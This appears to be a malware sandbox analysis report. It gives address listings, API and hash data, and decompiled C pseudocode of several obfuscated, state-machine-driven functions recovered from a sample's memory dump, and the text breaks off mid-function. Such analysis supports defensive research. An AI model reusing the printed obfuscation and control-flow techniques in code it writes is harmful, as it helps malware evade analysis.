                                          0x10001dcc
                                          0x10001d31
                                          0x10001d34
                                          0x10001d3b
                                          0x00000000
                                          0x10001d49
                                          0x10001d4b
                                          0x10001d50
                                          0x10001da7
                                          0x10001db6
                                          0x10001d52
                                          0x10001d52
                                          0x10001d58
                                          0x10001d99
                                          0x10001da4
                                          0x10001d5a
                                          0x10001d5a
                                          0x10001d5c
                                          0x10001d5e
                                          0x10001d67
                                          0x10001d87
                                          0x10001d96
                                          0x10001d69
                                          0x10001d6e
                                          0x10001d77
                                          0x10001d84
                                          0x10001d84
                                          0x10001d67
                                          0x10001d58
                                          0x10001d50
                                          0x10001d3b
                                          0x10001d2b
                                          0x10001cf9
                                          0x10001c53
                                          0x10001c5a
                                          0x00000000
                                          0x10001c5a
                                          0x10001c24
                                          0x10001c2d
                                          0x10001c33
                                          0x10001c35
                                          0x10001c3a
                                          0x10001c60
                                          0x10001c62
                                          0x10001c70
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10001c3a
                                          0x10001bf4
                                          0x10001bf9
                                          0x10001c07
                                          0x10001c07
                                          0x10001bf2
                                          0x10001b90
                                          0x10001b64
                                          0x10001b64
                                          0x10001b69
                                          0x10001b76
                                          0x10001b76
                                          0x10001b45
                                          0x10001b45
                                          0x10001b47
                                          0x10001b54
                                          0x10001b54

                                          APIs
                                          • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                          • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                          • Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
                                          • Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                          • Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D4B41, Relevance: 15.2, Strings: 12, Instructions: 226COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D4B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x6dca2c; // 0x248300
							 *((intOrPtr*)(_t202 + 0x218)) = E006D7CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E006C8736(0x454);
							 *0x6dca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E006D20C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E006CB112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E006CC6C7(_v536, _v572,  *0x6dca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E006D3E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E006CE29C(_v576, _v592,  &_v520);
						_t216 =  *0x6dca2c; // 0x248300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E006C5FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E006C2959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x6dca2c; // 0x248300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}







































                                          0x006d4b41
                                          0x006d4b47
                                          0x006d4b50
                                          0x006d4b54
                                          0x006d4b59
                                          0x006d4b5d
                                          0x006d4b64
                                          0x006d4b75
                                          0x006d4b79
                                          0x006d4b7b
                                          0x006d4b83
                                          0x006d4b91
                                          0x006d4b96
                                          0x006d4ba1
                                          0x006d4ba4
                                          0x006d4ba8
                                          0x006d4bad
                                          0x006d4bb5
                                          0x006d4bbd
                                          0x006d4bc2
                                          0x006d4bca
                                          0x006d4bd2
                                          0x006d4bda
                                          0x006d4be2
                                          0x006d4bea
                                          0x006d4bef
                                          0x006d4bf4
                                          0x006d4bfc
                                          0x006d4c04
                                          0x006d4c0c
                                          0x006d4c14
                                          0x006d4c1c
                                          0x006d4c2c
                                          0x006d4c30
                                          0x006d4c35
                                          0x006d4c3d
                                          0x006d4c45
                                          0x006d4c4d
                                          0x006d4c55
                                          0x006d4c5d
                                          0x006d4c6a
                                          0x006d4c6d
                                          0x006d4c71
                                          0x006d4c79
                                          0x006d4c81
                                          0x006d4c89
                                          0x006d4c91
                                          0x006d4c99
                                          0x006d4ca6
                                          0x006d4cb2
                                          0x006d4cb6
                                          0x006d4cbb
                                          0x006d4cc3
                                          0x006d4ccf
                                          0x006d4cd2
                                          0x006d4cd6
                                          0x006d4cde
                                          0x006d4ce6
                                          0x006d4cf7
                                          0x006d4d02
                                          0x006d4d06
                                          0x006d4d0e
                                          0x006d4d16
                                          0x006d4d1e
                                          0x006d4d26
                                          0x006d4d2e
                                          0x006d4d36
                                          0x006d4d3e
                                          0x006d4d46
                                          0x006d4d4e
                                          0x006d4d56
                                          0x006d4d5e
                                          0x006d4d66
                                          0x006d4d6e
                                          0x006d4d76
                                          0x006d4d7e
                                          0x006d4d8b
                                          0x006d4d8f
                                          0x006d4d97
                                          0x006d4d9f
                                          0x006d4da7
                                          0x006d4db2
                                          0x006d4db6
                                          0x006d4dba
                                          0x006d4dc2
                                          0x006d4dc2
                                          0x006d4dca
                                          0x006d4dca
                                          0x006d4dca
                                          0x006d4dca
                                          0x006d4dcc
                                          0x00000000
                                          0x00000000
                                          0x006d4dd2
                                          0x006d4e98
                                          0x006d4ea0
                                          0x006d4ea5
                                          0x006d4ea5
                                          0x006d4ea5
                                          0x006d4ead
                                          0x006d4eb2
                                          0x006d4ebc
                                          0x006d4ebc
                                          0x00000000
                                          0x006d4ebc
                                          0x006d4dde
                                          0x006d4e69
                                          0x006d4e6a
                                          0x006d4e70
                                          0x006d4e75
                                          0x006d4e7c
                                          0x006d4e7e
                                          0x00000000
                                          0x00000000
                                          0x006d4e84
                                          0x006d4e8e
                                          0x00000000
                                          0x006d4e8e
                                          0x006d4de6
                                          0x006d4e4e
                                          0x006d4e53
                                          0x00000000
                                          0x006d4e53
                                          0x006d4dee
                                          0x006d4e2c
                                          0x006d4e34
                                          0x006d4e39
                                          0x006d4e41
                                          0x00000000
                                          0x006d4e41
                                          0x006d4df2
                                          0x00000000
                                          0x00000000
                                          0x006d4df8
                                          0x006d4df9
                                          0x006d4e15
                                          0x006d4e1a
                                          0x006d4e1d
                                          0x006d4e26
                                          0x006d4e27
                                          0x006d4e27
                                          0x006d4ec3
                                          0x006d4ec9
                                          0x006d4f39
                                          0x006d4f4b
                                          0x006d4f50
                                          0x006d4f56
                                          0x006d4f59
                                          0x006d4f5f
                                          0x00000000
                                          0x006d4f5f
                                          0x006d4ecb
                                          0x006d4ed1
                                          0x006d4f25
                                          0x00000000
                                          0x006d4f2a
                                          0x006d4ed3
                                          0x006d4ed9
                                          0x00000000
                                          0x00000000
                                          0x006d4eef
                                          0x006d4ef4
                                          0x006d4ef6
                                          0x006d4ef9
                                          0x006d4efb
                                          0x006d4f15
                                          0x006d4efd
                                          0x006d4efd
                                          0x006d4f05
                                          0x006d4f0b
                                          0x006d4f0b
                                          0x00000000
                                          0x006d4f64
                                          0x006d4f64
                                          0x006d4f64
                                          0x006d4f71
                                          0x006d4f7c

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                          • API String ID: 0-3958274775
                                          • Opcode ID: 6fa3091d36e10bc96d47425dac9d8c73d0fcfb7aa7974f7eed797d9726f06c49
                                          • Instruction ID: 87f72d4082a281b95a738b1b6b5a26fb5eafe83f477a6cc87aa4b7612f7fde27
                                          • Opcode Fuzzy Hash: 6fa3091d36e10bc96d47425dac9d8c73d0fcfb7aa7974f7eed797d9726f06c49
                                          • Instruction Fuzzy Hash: 83A166715083819FD358CF65C49A52BFBE2FBC8358F104A1EF196962A0D7B88A49CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D3895, Relevance: 12.8, Strings: 10, Instructions: 274COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E006D3895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E006DAAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E006CB6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E006D4F7D(_v632, _v628, _t324);
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E006CF46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E006D889D(0x6dc9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x6dca2c; // 0x248300
												_t224 = _t321 + 0x230; // 0x710050
												E006CC680(_t224, _v648, _v608, _t303, _v636,  *0x6dca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E006D2025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E006CB566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}




























































                                          0x006d3895
                                          0x006d389b
                                          0x006d38a5
                                          0x006d38ad
                                          0x006d38b2
                                          0x006d38bd
                                          0x006d38c5
                                          0x006d38ca
                                          0x006d38d2
                                          0x006d38d7
                                          0x006d38df
                                          0x006d38e7
                                          0x006d38ef
                                          0x006d38f7
                                          0x006d38ff
                                          0x006d3907
                                          0x006d390f
                                          0x006d391e
                                          0x006d3922
                                          0x006d3924
                                          0x006d3933
                                          0x006d3934
                                          0x006d3938
                                          0x006d3940
                                          0x006d3948
                                          0x006d3950
                                          0x006d3958
                                          0x006d395d
                                          0x006d3965
                                          0x006d396d
                                          0x006d3975
                                          0x006d397d
                                          0x006d3985
                                          0x006d398d
                                          0x006d3995
                                          0x006d399a
                                          0x006d39a2
                                          0x006d39b0
                                          0x006d39b4
                                          0x006d39bc
                                          0x006d39c4
                                          0x006d39d1
                                          0x006d39d5
                                          0x006d39da
                                          0x006d39e2
                                          0x006d39ef
                                          0x006d39f3
                                          0x006d39f7
                                          0x006d39ff
                                          0x006d3a07
                                          0x006d3a0f
                                          0x006d3a17
                                          0x006d3a1f
                                          0x006d3a27
                                          0x006d3a2f
                                          0x006d3a37
                                          0x006d3a3f
                                          0x006d3a44
                                          0x006d3a49
                                          0x006d3a51
                                          0x006d3a59
                                          0x006d3a5e
                                          0x006d3a66
                                          0x006d3a6e
                                          0x006d3a76
                                          0x006d3a7e
                                          0x006d3a86
                                          0x006d3a8e
                                          0x006d3a96
                                          0x006d3a9e
                                          0x006d3aac
                                          0x006d3ab4
                                          0x006d3ab8
                                          0x006d3ac0
                                          0x006d3ac8
                                          0x006d3ad0
                                          0x006d3ad8
                                          0x006d3ae0
                                          0x006d3ae8
                                          0x006d3af0
                                          0x006d3af8
                                          0x006d3b00
                                          0x006d3b08
                                          0x006d3b18
                                          0x006d3b21
                                          0x006d3b24
                                          0x006d3b28
                                          0x006d3b30
                                          0x006d3b38
                                          0x006d3b45
                                          0x006d3b4e
                                          0x006d3b52
                                          0x006d3b5a
                                          0x006d3b6a
                                          0x006d3b6e
                                          0x006d3b76
                                          0x006d3b7e
                                          0x006d3b83
                                          0x006d3b8b
                                          0x006d3b90
                                          0x006d3b98
                                          0x006d3ba0
                                          0x006d3ba5
                                          0x006d3bad
                                          0x006d3bb5
                                          0x006d3bba
                                          0x006d3bc2
                                          0x006d3bca
                                          0x006d3bd2
                                          0x006d3bd7
                                          0x006d3bdc
                                          0x006d3be4
                                          0x006d3bec
                                          0x006d3bf1
                                          0x006d3bf9
                                          0x006d3c01
                                          0x006d3c0d
                                          0x006d3c10
                                          0x006d3c14
                                          0x006d3c1c
                                          0x006d3c20
                                          0x006d3c28
                                          0x006d3c30
                                          0x006d3c38
                                          0x006d3c38
                                          0x006d3c4a
                                          0x006d3db7
                                          0x00000000
                                          0x006d3c50
                                          0x006d3c52
                                          0x006d3da5
                                          0x006d3daa
                                          0x006d3dad
                                          0x00000000
                                          0x006d3c58
                                          0x006d3c5e
                                          0x006d3d0c
                                          0x006d3d17
                                          0x006d3d1e
                                          0x006d3d26
                                          0x006d3d2d
                                          0x006d3d34
                                          0x006d3d3b
                                          0x006d3d57
                                          0x006d3d5e
                                          0x006d3d65
                                          0x006d3d6c
                                          0x006d3d73
                                          0x006d3d7a
                                          0x006d3d7e
                                          0x006d3d80
                                          0x006d3d83
                                          0x00000000
                                          0x006d3c64
                                          0x006d3c6a
                                          0x006d3e2c
                                          0x006d3c70
                                          0x006d3c76
                                          0x006d3cf4
                                          0x006d3cfb
                                          0x006d3d00
                                          0x00000000
                                          0x006d3c78
                                          0x006d3c78
                                          0x006d3c7e
                                          0x00000000
                                          0x006d3c84
                                          0x006d3c84
                                          0x006d3c91
                                          0x006d3c96
                                          0x006d3cb8
                                          0x006d3cc2
                                          0x006d3cc8
                                          0x006d3ccd
                                          0x006d3cde
                                          0x006d3ce5
                                          0x00000000
                                          0x006d3ce5
                                          0x006d3c7e
                                          0x006d3c76
                                          0x006d3c6a
                                          0x006d3c5e
                                          0x006d3c52
                                          0x006d3e35
                                          0x006d3e3e
                                          0x006d3e3e
                                          0x006d3df7
                                          0x006d3dfc
                                          0x006d3dfe
                                          0x006d3e01
                                          0x006d3e04
                                          0x006d3e10
                                          0x00000000
                                          0x006d3e06
                                          0x006d3e06
                                          0x00000000
                                          0x006d3e06
                                          0x00000000
                                          0x006d3e15
                                          0x006d3e15
                                          0x006d3e15
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                          • API String ID: 2962429428-1089002639
                                          • Opcode ID: 5097adaac4783270210199fde2bc1034e987de15a44352282598248cc2bfeff1
                                          • Instruction ID: ad7c9146353370aa76aef044ad6e9ce9e58ca6d2787d90e339b8c7c3d94591e4
                                          • Opcode Fuzzy Hash: 5097adaac4783270210199fde2bc1034e987de15a44352282598248cc2bfeff1
                                          • Instruction Fuzzy Hash: 4CD102715083819FE368CF65C489A5BFBE2BBC4358F108A1EF1D9862A0D7B58549CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D42DA, Relevance: 7.9, Strings: 6, Instructions: 373COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E006D42DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
